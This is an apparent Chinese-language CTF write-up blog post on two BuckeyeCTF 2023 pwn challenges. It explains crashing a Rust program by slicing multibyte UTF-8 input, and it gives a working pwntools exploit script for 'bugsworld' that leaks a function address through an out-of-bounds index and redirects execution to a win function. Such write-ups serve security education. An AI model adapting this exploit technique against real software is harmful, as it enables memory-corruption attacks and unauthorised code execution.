<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.22.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="rust入门级pwn,">
<meta property="og:type" content="article">
<meta property="og:title" content="buckeyectf-2023">
<meta property="og:url" content="http://example.com/2023/10/10/buckeyectf-2023/index.html">
<meta property="og:site_name" content="lianwu&#39;s blog">
<meta property="og:description" content="rust入门级pwn,">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2023/10/10/buckeyectf-2023/Snipaste_2023-10-10_10-52-20.png">
<meta property="article:published_time" content="2023-10-10T02:14:02.000Z">
<meta property="article:modified_time" content="2023-10-10T07:39:59.560Z">
<meta property="article:author" content="lianwu">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/10/10/buckeyectf-2023/Snipaste_2023-10-10_10-52-20.png">


<link rel="canonical" href="http://example.com/2023/10/10/buckeyectf-2023/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/10/10/buckeyectf-2023/","path":"2023/10/10/buckeyectf-2023/","title":"buckeyectf-2023"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>buckeyectf-2023 | lianwu's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">lianwu's blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Igpay-Atinlay-Natoriay"><span class="nav-number">1.</span> <span class="nav-text">Igpay Atinlay Natoriay</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#bugsworld"><span class="nav-number">2.</span> <span class="nav-text">bugsworld</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="lianwu"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">lianwu</p>
  <div class="site-description" itemprop="description">Betting the rest of your life on pwn.</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/10/10/buckeyectf-2023/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="lianwu">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lianwu's blog">
      <meta itemprop="description" content="Betting the rest of your life on pwn.">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="buckeyectf-2023 | lianwu's blog">
      <meta itemprop="description" content="rust入门级pwn,">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          buckeyectf-2023
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-10-10 10:14:02 / 修改时间：15:39:59" itemprop="dateCreated datePublished" datetime="2023-10-10T10:14:02+08:00">2023-10-10</time>
    </span>

  
</div>

            <div class="post-description">rust入门级pwn,</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="Igpay-Atinlay-Natoriay"><a href="#Igpay-Atinlay-Natoriay" class="headerlink" title="Igpay Atinlay Natoriay"></a>Igpay Atinlay Natoriay</h1><p>给了一个rs文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">use std::io::&#123;self, Read, BufRead&#125;;</span><br><span class="line"></span><br><span class="line">fn main() &#123;</span><br><span class="line">    let input = loop &#123;</span><br><span class="line">        match get_line() &#123;</span><br><span class="line">            Ok(my_str) =&gt; break my_str,</span><br><span class="line">            Err(_) =&gt; &#123;</span><br><span class="line">                print!(&quot;Try again.&quot;);</span><br><span class="line">                continue;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    let mut output = String::new();</span><br><span class="line"></span><br><span class="line">    for word in input.split_whitespace() &#123;</span><br><span class="line">        let first = &amp;word[0..1];</span><br><span class="line">        let rest = &amp;word[1..];</span><br><span class="line"></span><br><span class="line">        output += rest;</span><br><span class="line">        output += first;</span><br><span class="line">        output += &quot;ay&quot;;</span><br><span class="line">        output += &quot; &quot;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    print!(&quot;&#123;output&#125;&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">fn get_line() -&gt; Result&lt;String, io::Error&gt; &#123;</span><br><span class="line">    let mut input = String::new();</span><br><span class="line"></span><br><span class="line">    io::BufReader::new(io::stdin().take(1862)).read_line(&amp;mut input)?;</span><br><span class="line"></span><br><span class="line">    Ok(input)</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>还有一个sh文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line"></span><br><span class="line">./igpay-atinlay-natoriay-3000 \</span><br><span class="line">    || printf &quot;You crashed my program :(\n$FLAG&quot;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>可以看到，当rust程序崩溃时就会打印出flag</p>
<p>再来分析rust程序，</p>
<p>允许我们输入一串字符串，同时将字符串的第一个字节移动到字符串的最后。</p>
<p>看起来是没有什么可利用的bug</p>
<p>但是rust是采用utf-8的，很明显，utf-8是一种变长编码，对于英文和常用的符号，确实是只有一个字节，但是对于中文和其他符号，就不止一个字节了。</p>
<p>那么在rust尝试分离一个字符的一个字节时，就会出现错误，从而导致程序崩溃。</p>
<p><img src="/2023/10/10/buckeyectf-2023/Snipaste_2023-10-10_10-52-20.png"></p>
<h1 id="bugsworld"><a href="#bugsworld" class="headerlink" title="bugsworld"></a>bugsworld</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context.log_level=&quot;debug&quot;</span><br><span class="line">context.arch=&quot;amd64&quot;</span><br><span class="line"></span><br><span class="line">r=process(&quot;./pwn&quot;)</span><br><span class="line">elf=ELF(&quot;./pwn&quot;)</span><br><span class="line"></span><br><span class="line">def send_content(content):</span><br><span class="line">    r.recvuntil(b&quot;&gt; &quot;)</span><br><span class="line">    r.sendline(str(len(content)).encode())</span><br><span class="line">    r.recvuntil(b&quot;&gt; &quot;)</span><br><span class="line">    r.sendline(&quot; &quot;.join(str(x) for x in content).encode())</span><br><span class="line"></span><br><span class="line">send_content([(elf.sym[&quot;instruction_table&quot;]-elf.sym[&quot;instruction_names&quot;])//32])         #泄露出do_move</span><br><span class="line">#do_move_addr=u64(r.recvuntil(&quot;&quot;))</span><br><span class="line">do_move_addr=u64(r.recvuntil(&quot;I&quot;,drop=True).ljust(8,b&quot;\x00&quot;))</span><br><span class="line">print(&quot;do_move_addr---&gt;&quot;+hex(do_move_addr))</span><br><span class="line">base=do_move_addr-elf.sym[&quot;do_move&quot;]</span><br><span class="line">win_addr=base+elf.sym[&quot;win&quot;]</span><br><span class="line">win_pointer_addr=(elf.sym[&quot;bytecode&quot;]+4*8-elf.sym[&quot;instruction_table&quot;])//8</span><br><span class="line">send_content([6,3,28,win_pointer_addr,win_addr])#将win_addr存放在bytecode[4]</span><br><span class="line">send_content([6,3])#利用do_jump,使table[code[]]指向win_addr并执行，从而获取到flag</span><br><span class="line">r.recvall(timeout=1)</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/09/22/csaw-2023-qual/" rel="prev" title="csaw_2023_qual">
                  <i class="fa fa-angle-left"></i> csaw_2023_qual
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/10/11/SWPU-2019-p1kkheap/" rel="next" title="SWPU 2019 p1kkheap">
                  SWPU 2019 p1kkheap <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">lianwu</span>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
